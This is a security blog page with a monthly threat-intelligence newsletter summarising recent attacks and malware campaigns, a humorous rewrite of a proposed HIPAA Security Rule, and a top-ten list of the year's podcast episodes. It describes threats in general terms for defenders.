January 2025 - Cybersecurity Threat Intelligence Newsletter

January 9, 2025

This is a monthly newsletter that I share internally with our Cybersecurity team. Feel free to take and use for your own team. Created with the help of ChatGPT.

ModeLeak Vulnerabilities in Google's Vertex AI Platform

Palo Alto Networks' Unit 42 team has uncovered two critical vulnerabilities, collectively termed "ModeLeak," within Google's Vertex AI platform. These flaws could enable attackers to escalate privileges and exfiltrate sensitive machine learning (ML) models, including fine-tuned large language model (LLM) adapters.

Key Insights:

Privilege Escalation via Custom Jobs: Attackers can exploit custom job permissions to gain unauthorized access to data services within a project, leading to potential exposure of sensitive information.

Model Exfiltration through Malicious Models: By deploying a poisoned model, adversaries can exfiltrate other fine-tuned models in the environment, risking proprietary data and custom optimizations.

Google has addressed these vulnerabilities by implementing fixes in the Vertex AI platform. Organizations utilizing Vertex AI should review their security protocols to ensure protection against similar threats.

Further Reading: Unit 42 Blog

Black Basta Ransomware Adopts Advanced Social Engineering Tactics

The Black Basta ransomware group has recently enhanced its attack strategies by incorporating sophisticated social engineering techniques, including email bombing, QR code phishing, and the deployment of custom malware payloads.

Key Developments:

Email Bombing: Attackers inundate targets with excessive emails by subscribing their addresses to numerous mailing lists. This tactic overwhelms victims and increases the likelihood of interaction with subsequent malicious communications.

Impersonation via Microsoft Teams: Threat actors pose as IT support personnel, contacting victims through Microsoft Teams to establish trust and facilitate the installation of remote access tools.

QR Code Phishing: Malicious QR codes are sent to victims, directing them to phishing sites designed to harvest credentials or deploy additional malware.

Custom Malware Deployment: The group utilizes bespoke tools such as KNOTWRAP (a memory-only dropper) and KNOTROCK (a .NET-based utility) to execute ransomware payloads stealthily.

Further Reading: The Hacker News

North Korean IT Workers Infiltrating Global Companies

Recent investigations have uncovered that operatives from the Democratic People's Republic of Korea (DPRK) are securing remote IT positions in international companies under false identities. These individuals channel their earnings to fund North Korea's weapons programs, posing significant security and compliance risks to employers.

Key Insights:

Use of False Identities: North Korean IT workers often utilize stolen or fabricated identities to obtain employment, making detection challenging.

Revenue Generation for DPRK: Earnings from these positions are funneled back to North Korea, supporting its sanctioned weapons development initiatives.

Potential for Insider Threats: Beyond financial implications, these operatives may have access to sensitive company data, increasing the risk of intellectual property theft and cyber espionage.

Further Reading: Unit 42 Blog

North Korean IT Workers Linked to Phishing Attacks via Malicious Video Conferencing Apps

Unit 42 researchers have identified a cluster of North Korean IT operatives, designated as CL-STA-0237, involved in phishing attacks that deploy malware through counterfeit video conferencing applications. Operating primarily from Laos, these individuals have secured positions in various companies, leveraging their roles to further malicious activities.

Key Insights:

Malware Distribution: The group utilizes fraudulent video conferencing platforms to disseminate malware, notably the BeaverTail and InvisibleFerret remote access trojans, compromising systems during supposed job interview processes.

Global Reach: By infiltrating organizations worldwide, these operatives support North Korea's illicit endeavors, including its weapons of mass destruction and ballistic missile programs.

Evolving Tactics: The shift from merely seeking income to engaging in aggressive malware campaigns indicates a significant escalation in their operational strategies.

Further Reading: Unit 42 Blog

Surge in 'ClickFix' Social Engineering Attacks

Cybersecurity researchers have identified a significant increase in the use of a social engineering tactic known as "ClickFix." This method deceives users into copying and pasting malicious commands into their systems, leading to malware infections.

Key Developments:

Deceptive Error Messages: Attackers present fake error dialogs, prompting users to execute provided commands to resolve non-existent issues.

Malware Delivery: By following these instructions, users inadvertently run scripts that download and install malware such as Lumma Stealer and AsyncRAT.

Global Impact: Campaigns employing ClickFix techniques have targeted organizations worldwide, with notable incidents involving fake GitHub security notifications and counterfeit software updates.

Further Reading: Proofpoint Blog

Malicious Ads Deliver SocGholish Malware to Kaiser Permanente Employees

A recent cyberattack has targeted Kaiser Permanente employees through malicious advertisements on Google Search, leading to the distribution of SocGholish malware.

Key Developments:

Malicious Advertisements: Threat actors placed deceptive ads mimicking Kaiser Permanente's HR portal to lure employees searching for benefits and payroll information.

Compromised Website Redirects: Clicking the fraudulent ad redirected users to a compromised website, bellonasoftware[.]com, which briefly displayed a phishing page before prompting a fake browser update.

SocGholish Malware Deployment: The fake browser update led to the download of "Update.js," a malicious script associated with the SocGholish malware campaign, designed to collect system information and potentially allow human operators to execute further malicious actions.

This incident highlights the evolving tactics of cybercriminals in exploiting trusted platforms like Google Ads to distribute malware.

Further Reading: Malwarebytes Blog

DarkGate Malware Leveraging Vishing via Microsoft Teams

Recent analyses have identified a concerning trend in which cybercriminals are deploying DarkGate malware through vishing (voice phishing) attacks conducted via Microsoft Teams.

Key Developments:

Social Engineering Tactics: Attackers impersonate employees from known client organizations during Microsoft Teams calls, convincing victims to download remote desktop applications like AnyDesk.

Malware Deployment: Once remote access is established, DarkGate malware is installed, enabling threat actors to execute malicious commands, gather system information, and maintain persistent access.

Operational Impact: Although some attacks have been thwarted before data exfiltration, the initial breach underscores vulnerabilities in user awareness and the potential for significant security incidents.

Further Reading: Trend Micro Research

Sophisticated Phishing Campaigns Exploit Trusted Platforms

Recent analyses have uncovered advanced phishing campaigns targeting employees across multiple industries and jurisdictions. These operations employ sophisticated techniques to bypass Secure Email Gateways (SEGs) and exploit trusted platforms, creating highly convincing schemes to deceive victims and steal their credentials.

Key Developments:

Exploitation of Trusted Platforms: Attackers leverage familiar platforms and services to enhance the credibility of their phishing attempts, making it more challenging for victims to identify fraudulent communications.

Bypassing Secure Email Gateways (SEGs): The campaigns utilize advanced methods to evade detection by SEGs, allowing malicious emails to reach employees' inboxes undetected.

Wide-Ranging Targets: Over 30 companies across 12 industries and 15 jurisdictions have been affected, indicating a broad and indiscriminate approach by the threat actors.

Further Reading: Group-IB Blog

Top Cyber Attacker Techniques (August–October 2024)

Recent analyses have identified key cyber attacker tactics, techniques, and procedures (TTPs) observed between August 1 and October 31, 2024.

Key Developments:

Phishing Incidents: Phishing accounted for 46% of all customer incidents during this period, indicating a significant rise likely due to high employee turnover and the accessibility of phishing kits.

Prevalent Malware: "SocGholish" and "LummaC2" emerged as the most frequently observed malware in customer environments, highlighting their widespread use in recent attacks.

Cloud Services Alerts: There was a 20% increase in cloud services alerts, correlating with the rising adoption of cloud accounts and associated security challenges.

Ransomware Activity: Despite a slowdown in "LockBit" ransomware activity due to law enforcement actions and a loss of affiliate trust, it remains a key player. Meanwhile, "RansomHub" is rising rapidly due to its attractive ransomware-as-a-service (RaaS) model. The U.S., manufacturing sector, and professional, scientific, and technical services (PSTS) sector are primary targets amidst an overall increase in ransomware attacks.

Initial Access Broker (IAB) Activity: IAB activity increased by 16%, heavily targeting U.S.-based organizations, possibly due to perceived financial capabilities stemming from cyber insurance.

Insider Threat Content: A 7% rise in insider threat discussions on cybercrime forums was noted, driven by significant financial incentives, underscoring the growing complexity of cybersecurity challenges.

Impersonating Domain Alerts: There was a 6% increase in alerts related to impersonating domains, indicating ongoing reliance on simple techniques to capture credentials and data.

Further Reading: ReliaQuest Blog

Phishing Attacks Double in 2024

Recent analyses reveal a significant surge in phishing activities throughout 2024, with overall phishing messages increasing by 202% in the latter half of the year. Notably, credential phishing attacks have escalated by 703% during the same period.

Key Developments:

Prevalence of Zero-Day URLs: Approximately 80% of malicious links identified are zero-day threats—newly created URLs designed to evade traditional detection methods.

Diversification of Attack Vectors: While link-based phishing remains predominant, there is a notable increase in text-based threats, such as business email compromise (BEC) and invoice scams, as well as file-based threats employing techniques like HTML smuggling.

Expansion Beyond Email: Phishing attacks are increasingly targeting multiple platforms, including SMS, LinkedIn, and Microsoft Teams, indicating a shift towards multichannel approaches.

Further Reading: Infosecurity Magazine

Surge in Phishing Attacks via New Top-Level Domains

Recent analyses reveal a significant increase in phishing attacks, with a 40% rise observed in the year ending August 2024. A substantial portion of this growth is attributed to the exploitation of new generic top-level domains (gTLDs) such as .shop, .top, and .xyz, which are favored by cybercriminals due to their low registration costs and minimal verification requirements.

Key Developments:

Disproportionate Use in Cybercrime: Although new gTLDs constitute only 11% of the market for new domains, they account for approximately 37% of reported cybercrime domains between September 2023 and August 2024.

Attraction to Low-Cost Registrations: Registrars offering domain registrations for less than $1, with little to no identity verification, are particularly appealing to spammers and scammers seeking to conduct malicious activities anonymously.

ICANN's Expansion Plans: Despite the misuse of these new gTLDs, the Internet Corporation for Assigned Names and Numbers (ICANN) is proceeding with plans to introduce additional gTLDs, potentially broadening the landscape for cybercriminal activities.

Further Reading: Krebs on Security

Surge in Suspicious Domain Registrations Exploiting High-Profile Events

Recent analyses have identified a significant increase in suspicious domain registration campaigns exploiting high-profile events, such as the 2024 Summer Olympics in Paris.

Key Developments:

Event-Driven Domain Registrations: Threat actors register deceptive domains containing event-specific keywords to mimic official websites, aiming to deceive users seeking legitimate information.

Exploitation of Public Interest: Cybercriminals leverage global events to attract large audiences, using fraudulent domains to distribute malware, conduct phishing attacks, or sell counterfeit merchandise.

Indicators of Malicious Activity: Monitoring domain registrations, DNS traffic, URL patterns, and textual characteristics can help identify and mitigate these threats.

Further Reading: Unit 42 Blog

Zloader Malware Adopts DNS Tunneling for Stealthier C2 Communications

Recent analyses have identified that the Zloader malware, a modular Trojan based on the leaked Zeus source code, has incorporated DNS tunneling into its command-and-control (C2) communication methods.

Key Developments:

DNS Tunneling Implementation: Zloader now employs a custom protocol over DNS, utilizing IPv4 to tunnel encrypted TLS network traffic. This technique enables the malware to conceal its C2 communications within standard DNS queries and responses, making detection more challenging.

Enhanced Anti-Analysis Features: The latest version of Zloader includes improved anti-analysis capabilities, such as environment checks and API import resolution algorithms, to evade malware sandboxes and static detection methods.

Interactive Shell Capability: Zloader has introduced an interactive shell that supports over a dozen commands, potentially facilitating hands-on keyboard activity by threat actors during attacks.

Further Reading: Zscaler Blog

Cybercriminals Exploit Fake CAPTCHAs to Distribute Malware

Recent analyses have identified a deceptive tactic where cybercriminals use fake CAPTCHA pages to distribute malware, exploiting users' trust in these verification systems.

Key Developments:

Malicious Redirects: Users visiting compromised websites are redirected to fraudulent CAPTCHA pages that closely mimic legitimate services like Google and CloudFlare.

Clipboard Hijacking: These fake CAPTCHAs silently copy malicious commands to the user's clipboard via JavaScript, prompting them to execute these commands unknowingly through the Windows Run prompt.

Malware Installation: Executing the copied commands leads to the installation of malware, including information stealers and remote-access trojans (RATs), which can extract sensitive data and provide persistent access to compromised systems.

Further Reading: ReliaQuest Blog

Threat Actors Exploit LDAP for Network Enumeration

Recent analyses have identified that both nation-state and cybercriminal threat actors are leveraging the Lightweight Directory Access Protocol (LDAP) to perform network enumeration within Active Directory environments.

Key Developments:

Abuse of LDAP Attributes: Attackers utilize LDAP queries to extract sensitive information, such as user accounts, group memberships, and permissions, facilitating lateral movement and privilege escalation within compromised networks.

Use of Enumeration Tools: Tools like BloodHound and its data collector, SharpHound, are commonly employed to map Active Directory structures, identifying potential attack paths and high-value targets.

Detection Challenges: Distinguishing between legitimate and malicious LDAP activity is difficult due to the high volume of benign LDAP traffic in typical network environments, complicating efforts to detect and mitigate these attacks.

Further Reading: Unit 42 Blog

'Araneida' Web Hacking Service Linked to Turkish IT Firm

Recent investigations have uncovered that 'Araneida,' a cloud-based web hacking service, is utilizing a cracked version of Acunetix—a commercial web application vulnerability scanner—to facilitate cyberattacks. Notably, this service has been traced back to a Turkish information technology firm.

Key Developments:

Exploitation of Cracked Software: Araneida employs an unauthorized version of Acunetix, enabling users to perform offensive reconnaissance, extract user data, and identify exploitable vulnerabilities on target websites.

Proxy Integration for Anonymity: The service incorporates a robust proxy network, allowing scans to originate from a diverse pool of IP addresses, thereby concealing the true source of the activity.

Cybercriminal Promotion: Advertised on multiple cybercrime forums and boasting a Telegram channel with nearly 500 subscribers, Araneida has been linked to the compromise of over 30,000 websites within six months. One user claimed to have purchased a luxury vehicle using proceeds from payment card data obtained through the service.

Connection to Turkish IT Firm: Investigations reveal that the domain araneida[.]co, operational since February 2023, is associated with an individual employed as a senior software developer at Bilitro Yazilim, an IT firm based in Ankara, Turkey.

Further Reading: Krebs on Security

LLMs Employed to Obfuscate Malicious JavaScript

Recent analyses have revealed that adversaries are leveraging large language models (LLMs) to obfuscate malicious JavaScript code, enhancing its ability to evade detection mechanisms.

Key Developments:

Automated Code Obfuscation: Attackers utilize LLMs to iteratively transform malicious JavaScript through techniques such as variable renaming, dead code insertion, and whitespace removal, without altering the code's functionality.

Evasion of Detection Tools: These LLM-generated variants can bypass traditional detection tools, including static analysis models, by producing natural-looking code that is harder to identify as malicious.

Scalability of Attacks: The use of LLMs enables the creation of numerous unique malware variants at scale, increasing the difficulty for security systems to detect and mitigate these threats effectively.

Further Reading: Unit 42 Blog

Mobile Phishing Attacks Employ New Tactics to Evade Security Measures

Recent analyses have identified a novel social engineering tactic targeting mobile banking users. Attackers are leveraging Progressive Web Apps (PWAs) and WebAPKs to distribute phishing websites disguised as legitimate applications, effectively bypassing traditional security warnings and app store vetting processes.

Key Insights:

Exploitation of PWAs and WebAPKs: Unlike traditional apps, these malicious PWAs and WebAPKs are essentially phishing websites packaged to look like legitimate applications. This means they do not exhibit the typical behaviors or characteristics associated with malware, making detection more challenging.

Bypassing Security Measures: Their ability to bypass traditional security warnings of a mobile operating system, and total sidestepping of app store vetting processes, is particularly concerning. This allows attackers to distribute malicious content without triggering standard security alerts.

Anticipated Increase in Sophistication: It is anticipated that more sophisticated and varied phishing campaigns utilizing PWAs and WebAPKs will emerge, unless mobile platforms change their approach towards them.

Further Reading: KnowBe4 Blog

DHHS Angry Translator: Breaking Down the Latest HIPAA Security Rule Proposal

January 7, 2025

Let’s face it: regulatory updates like those from the Department of Health and Human Services (DHHS) often come wrapped in a blanket of formal language that makes you wonder, What are they really saying? Enter the DHHS Angry Translator, here to break it down and tell it like it is. Like the recently introduced CISA Angry Translator, the DHHS Angry Translator, Hank, has a no-nonsense take on the proposed changes to the HIPAA Security Rule—because sometimes, you need a little fire to get the message across.

Created with help from ChatGPT

DHHS Says:
"Covered entities and business associates must adopt reasonable and appropriate administrative, physical, and technical safeguards to protect the confidentiality, integrity, and availability of ePHI."

Hank:
"Look, people! You’re handling sensitive health information here—stop treating it like a casual to-do list. Lock it down! If you wouldn’t leave patient records lying around in a coffee shop, don’t let your servers be a free-for-all!"

DHHS Says:
"We propose clarifying the definition of 'security incident' to ensure timely identification and response to unauthorized access, use, or disclosure of ePHI."

Hank:
"Translation: Stop pretending you didn’t notice the breach. When someone jiggles the doorknob, that’s your cue to ACT, not wait for the whole door to come down!"

DHHS Says:
"Entities must perform regular risk assessments to identify vulnerabilities and implement measures to mitigate those risks effectively."

Hank:
"Let me break it down for you: Take a good, hard look at your systems. If you see a crack, fix it! Don’t wait for a cybercriminal to make it a canyon!"

DHHS Says:
"The proposed changes aim to enhance accountability and transparency in managing ePHI security."

Hank:
"Translation: If you mess up, we’re coming for you. There’s no hiding anymore. Either you get your house in order, or we’ll do it for you—with penalties."

DHHS Says:
"We propose revisions to the administrative safeguards, emphasizing the necessity of documented policies and procedures for incident response and risk management."

Hank:
"Y’all need to WRITE THIS DOWN! A half-baked plan in someone’s head doesn’t cut it. If a breach happens and your response is ‘Uh... what now?’—you’re already toast!"

DHHS Says:
"The proposal includes requirements to integrate continuous monitoring into risk management practices for ePHI security."

Hank:
"‘Continuous monitoring’ means don’t just check your security once a year like it’s a New Year’s resolution. Stay on top of it! Hackers aren’t taking vacations—they’re coming for you every day!"

DHHS Says:
"Entities must evaluate their use of encryption to ensure ePHI remains secure during transmission and storage."

Hank:
"If your data isn’t encrypted, it’s like sending patient records via postcard: everyone can see it! Encrypt. Everything. Period."

DHHS Says:
"We are revising technical safeguard requirements to account for emerging technologies and new cybersecurity threats."

Hank:
"Translation: If you’re still using security from the early 2000s, it’s time for an upgrade. Hackers have moved on, and so should you!"

DHHS Says:
"Workforce training should address phishing attacks, unauthorized device use, and secure access to ePHI."

Hank:
"Teach your people that clicking shady links isn’t just a bad idea—it’s a disaster waiting to happen. Also, tell them to stop using their cousin’s unsecured iPad for work!"

DHHS Says:
"The proposed changes highlight accountability mechanisms for business associates handling ePHI."

Angry Translator:
"Listen up, third parties: If you’re touching ePHI, you’re on the hook too. No more pointing fingers when things go wrong. Handle the data like it’s your grandma’s—or get burned!"

DHHS Says:
"Periodic evaluations of safeguards will ensure compliance with evolving security standards."

Angry Translator:
"‘Periodic evaluations’ means you don’t just set it and forget it. Check your defenses regularly, or you’ll be picking up the pieces after the next attack!"

Final Note from the Angry Translator:
"This proposal isn’t just about checking boxes—it’s about protecting people. If your security plan is older than your favorite streaming service, fix it. Now. Because when things go wrong, it’s not just your reputation on the line—it’s patients’ trust and safety too."

The commenting period for the HIPAA Security Rule Draft is open until March 7, 2025. If you’re at a healthcare organization make sure to consume it and submit your public comments. I am currently doing a deep dive on the proposal and will have thoughts in a future blog post.

Top 10 Exploring Information Security Podcasts

December 31, 2024

As we wrap up an incredible year, we're thrilled to reflect on the top podcasts of 2024 that captured the attention of listeners across the cybersecurity community. These episodes brought forward thought-provoking discussions, practical insights, and exciting guests, making this a standout year for Exploring Information Security. Below are the top 10 episodes that ChatGPT thought were the best of 2024. As I analyzed the analytics I couldn’t decide which stats to focus in on. Here’s what the podcasts look like based on plays from Apple Podcast Analytics.

Screenshot of the analytics from Apple Podcasts analytics

I thought about going by average consumption but I noticed that we have lower percentage than in the past. That’s due to the longer episodes I’m putting out. When I’m putting out 20-30 min episodes I get closer to a 70-80% consumption rate. Do unique listeners and engagement say more? At this point I decided to just let ChatGPT do the analysis of all the analytics and provide me with the Top 10 list. It also, wrote the first draft of this blog post. I’m okay with the Top 10 list. I believe it represents the podcast well and some of the interest I’ve seen in other places regarding individual episodes.

The numbers are just from Apple Podcast. There are listeners on other platforms such as Spotify, Amazon, and other podcast platforms that grab the feed. I also expanded into YouTube in the middle of the year and hope to get that tuned better. I may try to consolidate the stats all into one platform at some point but I’m not there yet. Apple Podcast is the most popular platform so I think it provides the best sample size.

Without further ado let’s get into the Top 10 list for 2024.

2024 Top 10 Exploring Information Security Podcast

1. Exploring Information Security 2024 Relaunch

Release Date: January 2, 2024
Guest: Solo Episode

Key Highlights:
Our relaunch episode kicked off the year by outlining an exciting new direction for Exploring Information Security. I’m shocked that this came out on top but there seemed to be some excitement at the return of the podcast. Which I’m very appreciative of and makes me want to kick myself for not bringing the podcast back sooner.
Listen Here: Exploring Information Security 2024 Relaunch

2. What Cybersecurity Tools Every Organization Should Have

Release Date: February 27, 2024
Guest: Rob Fuller

Key Highlights:
Rub Fuller shared insights into the essential tools that every organization should have to secure their digital infrastructure. The episode covered endpoint protection, threat intelligence platforms, and emerging technologies that simplify security operations. This was the result of a discussion we had during another podcast recording. I thought it was a great discussion to turn into it’s own topic.
Listen Here: What Cybersecurity Tools Every Organization Should Have

3. How to Hack a Satellite

Release Date: January 23, 2024
Guest: Tim Fowler

Key Highlights:
Tim Fowler took listeners on a deep dive into the vulnerabilities and challenges of securing space technology. From real-world case studies of satellite hacks to strategies for defense, this episode offered a unique and fascinating perspective on the intersection of cybersecurity and aerospace. This will continue to grow as a new field for cybersecurity very similar to how cloud security, identity access management, and AI have become their own fields. And as usual we’re already behind on securtiy…
Listen Here: How to Hack a Satellite

4. What Are the Hiring Trends in Cybersecurity for 2024?

Release Date: January 16, 2024
Guest: Erin Barry

Key Highlights:
In this insightful episode, Erin Barry analyzed the latest hiring trends in cybersecurity heading into 2024. The conversation touched on the growing demand for professionals with cloud and AI expertise, the importance of soft skills, and tips for breaking into the field. A must-listen for job seekers and industry leaders. This is a podcast I’d like to make a staple for the new year because it did seem to be a popular topic.
Listen Here: What Are the Hiring Trends in Cybersecurity for 2024?

5. How to Navigate a Career in Cybersecurity

Release Date: August 13, 2024
Guest: Ralph Collum

Key Highlights:
Ralph Collum shared his journey from entry-level roles to executive leadership in cybersecurity. The discussion covered mentorship, certifications, and strategies for navigating career plateaus. I always enjoy talking to Ralph. He’s very passionate about developing careers in Cybersecurity. It makes sense that this one would follow the hiring trends for 2024. I expect that with the current hiring market job seeking and career podcast episodes will remain popular.
Listen Here: How to Navigate a Career in Cybersecurity

6. How AI Is Impacting Cybersecurity

Release Date: July 30, 2024
Guest: Steve Orrin

Key Highlights:
Steve Orrin explored the dual role of artificial intelligence in cybersecurity, highlighting its use in threat detection and the ethical concerns it raises. The episode featured real-world examples of AI-driven security solutions and debated the future of automation in the industry. I really enjoyed this conversation with Steve because he’s not only an executive but someone who also attends DEFCON on a regular basis. He traverses both worlds well and has a very intelligence take on key topics in Cybersecurity.
Listen Here: How AI Is Impacting Cybersecurity

7. How Responding to Phishing Has Changed in the Last 5 Years

Release Date: January 30, 2024
Guest: Kyle Andrus

Key Highlights:
Kyle Andrus and I discussed how phishing has changed since I last had him on the podcast. I always enjoy have Kyle on because we always have a good conversation. In fact he and I have had a couple recording sessions at this point on other topics because we always end up talking about something else. I’ve got another recording sessions scheduled with him for early 2025 to talk about ransomware gangs.
Listen Here: How Responding to Phishing Has Changed in the Last 5 Years

8. How to Automate Information Security with Python

Release Date: July 23, 2024
Guest: Mark Baggett

Key Highlights:
Mark Baggett broke down the ways Python is revolutionizing cybersecurity automation. From simplifying vulnerability scanning to streamlining log analysis, this episode was packed with actionable insights for security professionals looking to enhance their workflows. Mark is the Python guru for Cybersecurity. He’s written an entire SANS class on it and he’s been talking about Python ever since I’ve been in the industry.
Listen Here: How to Automate Information Security with Python

9. What Is Mimikatz?

Release Date: February 6, 2024
Guest: Rob Fuller

Key Highlights:
Rob Fuller delivered an in-depth look at Mimikatz, a powerful tool often used in penetration testing and malicious attacks. He explained its functionality, provided examples of its use, and discussed the countermeasures security teams can implement to defend against it. I’ve dubbed Rob the Hacker Historian because of his wealth of knowledge in hacking. He made the Top 10 list three times this year and was also in the RERELEASE of the episode on the MS08-067 vulnerability.
Listen Here: What Is Mimikatz?

10. How Worrying Is SIM Swapping in 2024?

Release Date: August 6, 2024
Guest: Rob Fuller

Key Highlights:
Rob Fuller returned to discuss the NOT SO alarming rise of SIM swapping attacks in 2024. This was based on a LinkedIn post he made on SIM Swapping that got quite a bit of commentary. I thought it was a great discussion and would make for an interesting episode. Surprise! It was a great conversation and people seemed to engage with the podcast episode. These are the kind of episodes I want to have that challenge some of the norms within Cybersecurity.
Listen Here: How Worrying Is SIM Swapping in 2024?

Honorable Mentions

Two of the people I always wanted to have on the podcast but I was to scared to ask prior to shutting down the podcast was Troy Hunt and Patrick Gray. Both people have helped me navigate and shape my career in cybersecurity and I was happy that both agreed to come on. Both were absolutely amazing people to have a conversation with.

What is Have I Been Pwned?

The Origins of Risky Business with Patrick Gray

Finally, Dave Chronister has been a huge supporter of the show and a wonderful friend. He also runs a phenomenal conference called ShowMeCon (early-bird tickets available now!)! He’s always a joy to have on the show but this past year he sponsored several episodes and I had a lot of great conversations with presenters from the conference. I have probably never laughed more than I did talking to Kevin Johnson about whatever was on his mind. Also, I really enjoyed the panel we did at ShowMeCon. Unfortunately, I forgot to hit the record button and thus entered the mythical status as a podcast that only those present got to enjoy.

ShowMeCon: Kevin Johnson and whatever he wants to talk about

Final Thoughts

As always, I’m grateful to the listeners of the show. I don’t hear from a lot of them but based on the numbers and engagement they’re out there. I’m also super grateful to all the guests that have come on the show to share their insights and knowledge. I am looking forward to another great year of conversations with amazing guests!

What were your favorite episodes in 2024?